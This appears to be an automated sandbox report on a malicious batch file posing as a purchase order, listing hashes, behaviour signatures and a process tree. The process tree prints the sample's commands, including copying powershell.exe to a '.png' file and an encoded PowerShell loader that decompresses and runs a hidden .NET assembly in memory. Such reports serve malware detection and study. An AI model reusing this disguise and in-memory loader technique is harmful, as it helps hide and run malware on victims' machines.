Analysis

  • max time kernel
    121s
  • max time network
    127s
  • platform
    windows7_x64
  • resource
    win7-20230831-en
  • resource tags

    arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system
  • submitted
    11-10-2023 19:51

General

  • Target

    P.O 2023-69415002.bat

  • Size

    1018KB

  • MD5

    e4e1075b03f102d9d07619194b7e5fbb

  • SHA1

    ef833d4052c3efff9315c8f2845c2d5e20f7165f

  • SHA256

    b78cf80d94f017c5f389590f2f3b312f1694d93e5e6aebf296e46b5b9dbca2da

  • SHA512

    1faffae63d7e4731ecc30b1c02f60625632d5c2cc9944dc2870acf75fcb50bd66cd32f893f68a2400bdd21f06da6086a760c3b654969829114c857faeaeb432e

  • SSDEEP

    24576:/qfa722mM+vmWw3/MzxW2LhbOTx61lx6ULpzF:ku+HxVbOVyT

Score
7/10

Malware Config

Signatures

  • Executes dropped EXE 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 19 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\P.O 2023-69415002.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2576
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\P.O 2023-69415002.bat"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2920
      • C:\Windows\system32\xcopy.exe
        xcopy /d /q /y /h /i C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\Eoqrexflxja.png
        3⤵
          PID:3060
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo F "
          3⤵
            PID:3056
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /S /D /c" echo F "
            3⤵
              PID:2688
            • C:\Windows\system32\xcopy.exe
              xcopy /d /q /y /h /i "C:\Users\Admin\AppData\Local\Temp\P.O 2023-69415002.bat" C:\Users\Admin\AppData\Local\Temp\Eoqrexflxja.png.bat
              3⤵
                PID:2716
              • C:\Users\Admin\AppData\Local\Temp\Eoqrexflxja.png
                C:\Users\Admin\AppData\Local\Temp\Eoqrexflxja.png -win 1 -enc JABVAGQAbwByAGoAbgBhAHEAIAA9ACAAWwBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQATABpAG4AZQBzACgAKAAoAFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AEcAZQB0AEMAdQByAHIAZQBuAHQAUAByAG8AYwBlAHMAcwAoACkALgBNAGEAaQBuAE0AbwBkAHUAbABlAC4ARgBpAGwAZQBOAGEAbQBlACkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACIALgBiAGEAdAAiACkALAAgAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4ACkAIAB8ACAAUwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAC0AbABhAHMAdAAgADEAOwAgACQAQwB4AGkAcwBmAGYAZgBzAG8AIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAVQBkAG8AcgBqAG4AYQBxACkAOwAkAFgAeQB4AGcAaQB0AGIAcAB4AG4AIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAgACwAIAAkAEMAeABpAHMAZgBmAGYAcwBvACAAKQA7ACQAbwB1AHQAcAB1AHQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AOwAkAFkAcQBqAHoAdgBuAHQAZQB1AHoAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARwB6AGkAcABTAHQAcgBlAGEAbQAgACQAWAB5AHgAZwBpAHQAYgBwAHgAbgAsACAAKABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQA7ACQAWQBxAGoAegB2AG4AdABlAHUAegAuAEMAbwBwAHkAVABvACgAIAAkAG8AdQB0AHAAdQB0ACAAKQA7ACQAWQBxAGoAegB2AG4AdABlAHUAegAuAEMAbABvAHMAZQAoACkAOwAkAFgAeQB4AGcAaQB0AGIAcAB4AG4ALgBDAGwAbwBzAGUAKAApADsAWwBiAHkAdABlAFsAXQBdACAAJABDAHgAaQBzAGYAZgBmAHMAbwAgAD0AIAAkAG8AdQB0AHAAdQB0AC4AVABvAEEAcgByAGEAeQAoACkAOwBbAEEAcgByAGEAeQBdADoAOgBSAGUAdgBlAHIAcwBlACgAJABDAHgAaQBzAGYAZgBmAHMAbwApADsAIAAkAEQAcQBpAGMAeABrAGkAagBxAGIAZAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgAJABDAHgAaQBzAGYAZgBmAHMAbwApADsAIAAkAEIAcwBsAHQAbgAgAD0AIAAkAEQAcQBpAGMAeABrAGkAagBxAGIAZAAuAEcAZQB0AEUAeABwAG8AcgB0AGUAZABUAHkAcABlAHMAKAApAFsAMABdADsAIAAkAEkAawB4AHUAdgBsAGUAaABpAGIAIAA9ACAAJABCAHMAbAB0AG4ALgBHAGUAdABNAGUAdABoAG8AZABzACgAKQBbADAAXQAuAEkAbgB2AG8AawBlACgAJABuAHUAbABsACwAIAAkAG4AdQBsAGwAKQAgAHwAIABPAHUAdAAtAE4AdQBsAGwA
                3⤵
                • Executes dropped EXE
                • Suspicious behavior: CmdExeWriteProcessMemorySpam
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:2764

          Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Local\Temp\Eoqrexflxja.png

            Filesize

            442KB

            MD5

            92f44e405db16ac55d97e3bfe3b132fa

            SHA1

            04c5d2b4da9a0f3fa8a45702d4256cee42d8c48d

            SHA256

            6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7

            SHA512

            f7d85cfb42a4d859d10f1f06f663252be50b329fcf78a05bb75a263b55235bbf8adb89d732935b1325aaea848d0311ab283ffe72b19db93e6c28a859204fdf9f

          • C:\Users\Admin\AppData\Local\Temp\Eoqrexflxja.png

            Filesize

            442KB

            MD5

            92f44e405db16ac55d97e3bfe3b132fa

            SHA1

            04c5d2b4da9a0f3fa8a45702d4256cee42d8c48d

            SHA256

            6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7

            SHA512

            f7d85cfb42a4d859d10f1f06f663252be50b329fcf78a05bb75a263b55235bbf8adb89d732935b1325aaea848d0311ab283ffe72b19db93e6c28a859204fdf9f

          • memory/2764-8-0x00000000745C0000-0x0000000074B6B000-memory.dmp

            Filesize

            5.7MB

          • memory/2764-9-0x00000000745C0000-0x0000000074B6B000-memory.dmp

            Filesize

            5.7MB

          • memory/2764-11-0x0000000002540000-0x0000000002580000-memory.dmp

            Filesize

            256KB

          • memory/2764-12-0x0000000002540000-0x0000000002580000-memory.dmp

            Filesize

            256KB

          • memory/2764-10-0x0000000002540000-0x0000000002580000-memory.dmp

            Filesize

            256KB

          • memory/2764-13-0x00000000745C0000-0x0000000074B6B000-memory.dmp

            Filesize

            5.7MB